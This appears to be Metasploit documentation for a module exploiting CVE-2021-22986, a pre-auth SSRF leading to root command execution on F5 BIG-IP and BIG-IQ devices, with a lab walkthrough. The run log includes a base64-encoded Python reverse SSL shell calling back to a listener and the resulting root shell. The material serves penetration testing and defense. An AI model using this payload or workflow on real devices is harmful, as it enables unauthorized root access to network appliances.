## Vulnerable Application

### Description

This module exploits a pre-auth SSRF in the F5 iControl REST API's
`/mgmt/shared/authn/login` endpoint to generate an `X-F5-Auth-Token` that
can be used to execute root commands on an affected BIG-IP or BIG-IQ
device. This vulnerability is known as CVE-2021-22986.

CVE-2021-22986 affects the following BIG-IP versions:

* 12.1.0 - 12.1.5
* 13.1.0 - 13.1.3
* 14.1.0 - 14.1.3
* 15.1.0 - 15.1.2
* 16.0.0 - 16.0.1

And the following BIG-IQ versions:

* 6.0.0 - 6.1.0
* 7.0.0
* 7.1.0

Tested against BIG-IP Virtual Edition 16.0.1 in VMware Fusion.

### Setup

Import a vulnerable BIG-IP or BIG-IQ OVA, such as
`BIGIP-16.0.1-0.0.3.ALL-vmware.ova`, into your desired hypervisor. Boot
the virtual appliance, and it should be exploitable out of the box once
it's up.

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).

## Targets

### 0

This executes a Unix command.

### 1

This uses a Linux dropper to execute code.

## Options

### USERNAME

Set this to a valid admin username. Defaults to `admin`.

### ENDPOINT

Set this to a custom token generation endpoint. Random if unset.

## Scenarios

### BIG-IP Virtual Edition 16.0.1 in VMware Fusion

```
msf > use exploit/linux/http/f5_icontrol_rest_ssrf_rce
[*] Using configured payload cmd/unix/reverse_python_ssl
msf exploit(linux/http/f5_icontrol_rest_ssrf_rce) > options

Module options (exploit/linux/http/f5_icontrol_rest_ssrf_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   ENDPOINT                    no        Custom token generation endpoint
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      443              yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   admin            yes       Valid admin username
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_python_ssl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


msf exploit(linux/http/f5_icontrol_rest_ssrf_rce) > set rhosts 192.168.123.134
rhosts => 192.168.123.134
msf exploit(linux/http/f5_icontrol_rest_ssrf_rce) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf exploit(linux/http/f5_icontrol_rest_ssrf_rce) > run

[+] python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zLHNzbApzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uY29ubmVjdCgoJzE5Mi4xNjguMTIzLjEnLDQ0NDQpKQpzPXNzbC53cmFwX3NvY2tldChzbykKcU49RmFsc2UKd2hpbGUgbm90IHFOOgoJZGF0YT1zLnJlY3YoMTAyNCkKCWlmIGxlbihkYXRhKT09MDoKCQlxTiA9IFRydWUKCXByb2M9c3VicHJvY2Vzcy5Qb3BlbihkYXRhLHNoZWxsPVRydWUsc3Rkb3V0PXN1YnByb2Nlc3MuUElQRSxzdGRlcnI9c3VicHJvY2Vzcy5QSVBFLHN0ZGluPXN1YnByb2Nlc3MuUElQRSkKCXN0ZG91dF92YWx1ZT1wcm9jLnN0ZG91dC5yZWFkKCkgKyBwcm9jLnN0ZGVyci5yZWFkKCkKCXMuc2VuZChzdGRvdXRfdmFsdWUpCg==')[0]))"
[*] Started reverse SSL handler on 192.168.123.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Generating token via SSRF...
[*] Username: admin
[*] Endpoint: /tm/analytics/proc-cpu/generate-report/indexing
[+] Successfully generated token: CDDASK5TXQN246AJVZNAAPM7NS
[+] The target is vulnerable.
[*] Executing Unix Command for cmd/unix/reverse_python_ssl
[*] Executing command: eval $(echo cHl0aG9uIC1jICJleGVjKF9faW1wb3J0X18oJ2Jhc2U2NCcpLmI2NGRlY29kZShfX2ltcG9ydF9fKCdjb2RlY3MnKS5nZXRlbmNvZGVyKCd1dGYtOCcpKCdhVzF3YjNKMElITnZZMnRsZEN4emRXSndjbTlqWlhOekxHOXpMSE56YkFwemJ6MXpiMk5yWlhRdWMyOWphMlYwS0hOdlkydGxkQzVCUmw5SlRrVlVMSE52WTJ0bGRDNVRUME5MWDFOVVVrVkJUU2tLYzI4dVkyOXVibVZqZENnb0p6RTVNaTR4TmpndU1USXpMakVuTERRME5EUXBLUXB6UFhOemJDNTNjbUZ3WDNOdlkydGxkQ2h6YnlrS1NIazlSbUZzYzJVS2QyaHBiR1VnYm05MElFaDVPZ29KWkdGMFlUMXpMbkpsWTNZb01UQXlOQ2tLQ1dsbUlHeGxiaWhrWVhSaEtUMDlNRG9LQ1FsSWVTQTlJRlJ5ZFdVS0NYQnliMk05YzNWaWNISnZZMlZ6Y3k1UWIzQmxiaWhrWVhSaExITm9aV3hzUFZSeWRXVXNjM1JrYjNWMFBYTjFZbkJ5YjJObGMzTXVVRWxRUlN4emRHUmxjbkk5YzNWaWNISnZZMlZ6Y3k1UVNWQkZMSE4wWkdsdVBYTjFZbkJ5YjJObGMzTXVVRWxRUlNrS0NYTjBaRzkxZEY5MllXeDFaVDF3Y205akxuTjBaRzkxZEM1eVpXRmtLQ2tnS3lCd2NtOWpMbk4wWkdWeWNpNXlaV0ZrS0NrS0NYTXVjMlZ1WkNoemRHUnZkWFJmZG1Gc2RXVXBDZz09JylbMF0pKSI= | base64 -d)
[*] Command shell session 1 opened (192.168.123.1:4444 -> 192.168.123.134:40632) at 2021-03-30 17:30:28 -0500
[!] Command execution timed out

id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
uname -a
Linux localhost.localdomain 3.10.0-862.14.4.el7.ve.x86_64 #1 SMP Tue Oct 20 10:03:05 PDT 2020 x86_64 x86_64 x86_64 GNU/Linux
```
